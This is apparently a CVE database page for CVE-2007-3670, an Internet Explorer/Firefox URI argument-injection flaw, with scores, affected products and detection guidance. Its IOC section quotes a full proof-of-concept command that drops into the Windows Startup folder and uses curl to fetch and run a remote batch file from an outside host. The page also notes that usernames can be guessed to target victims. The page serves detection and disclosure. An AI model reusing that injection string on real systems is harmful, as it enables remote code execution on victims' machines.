cbcvebase.
CVE-2007-3670
published 2007-07-10

CVE-2007-3670: Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote…

PriorityP426medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
29.35%
97.9th percentile
Argument injection vulnerability in Microsoft Internet Explorer, when running on systems with Firefox installed and certain URIs registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in a (1) FirefoxURL or (2) FirefoxHTML URI, which are inserted into the command line that is created when invoking firefox.exe. NOTE: it has been debated as to whether the issue is in Internet Explorer or Firefox. As of 20070711, it is CVE's opinion that IE appears to be failing to properly delimit the URL argument when invoking Firefox, and this issue could arise with other protocol handlers in IE as well. However, Mozilla has stated that it will address the issue with a "defense in depth" fix that will "prevent IE from sending Firefox malicious data."

Affected

10 ranges
VendorProductVersion rangeFixed in
applequicktime<= 7.1.5
microsoftinternet_explorer
microsoftinternet_explorer
microsoftinternet_explorer
mozillafirefox<= 2.0.0.4
mozillafirefox<= 2.0.0.6
mozillafirefox
mozillafirefox
mozillathunderbird
netscapenavigator

Detection & IOCsextracted from sources · hover to see the quote

commandFirefoxURL-308046B0AF4A39CB:" -P -MOZ_LOG=raw,Widget:4 -MOZ_LOG_FILE="C:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/&cd ..&cd ..&cd Users&cd Public&curl -o z.bat poc.mm2.in&z.bat
domainpoc.mm2.in
pathC:/Users/IEUser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/
filenamez.bat
otherfirefoxurl-308046b0af4a39cb:
  • Monitor for process launches of firefox.exe or navigator.exe with suspicious arguments including '-chrome', '-MOZ_LOG', or '-MOZ_LOG_FILE' passed via URI handler invocation (firefoxurl: or navigatorurl: schemes).
  • Detect use of the '-chrome' argument passed to Firefox or Navigator via URI handler, which enables JavaScript execution in privileged Chrome context.
  • Alert on command lines containing '-MOZ_LOG' or '-MOZ_LOG_FILE' arguments passed to Firefox, especially when combined with shell metacharacters (& ; |) or paths pointing to Startup folders.
  • Detect spaces and double-quote characters in URIs passed to external program handlers (mailto:, firefoxurl:, navigatorurl:), which are the injection vector for argument smuggling.
  • Monitor for files written to the Windows Startup folder (e.g. %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\) by Firefox or child processes spawned from Firefox.
  • Detect cmd.exe being instantiated via Mozilla XPCOM interfaces (nsILocalFile / nsIProcess) from within a browser JavaScript context, as used in the navigatorurl PoC exploit.
  • ·The -osint flag was introduced as a fix for CVE-2007-3670 in nsAppRunner.cpp, but the -MOZ_LOG and -MOZ_LOG_FILE arguments bypass this check because they are handled in LogCommandLineHandler.cpp without the -osint guard, causing the vulnerability to resurface in later Firefox versions.
  • ·Major browsers (Chrome, Firefox itself) encode special characters in URLs (e.g. " becomes %22) before passing to URI handlers, preventing exploitation. However, Windows applications such as Microsoft Office do not perform this encoding, making them viable attack vectors.
  • ·The exploit payload requires knowledge of the victim's Windows username to construct the correct Startup folder path; in many organizations the username matches the email address prefix, enabling targeted attacks via email delivery.
  • ·Red Hat Enterprise Linux versions of Firefox and Thunderbird are not affected by CVE-2007-3670 or its related variants (CVE-2007-4038, CVE-2007-4039).

CVSS provenance

nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat5.0MEDIUM
vendor_ubuntu4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.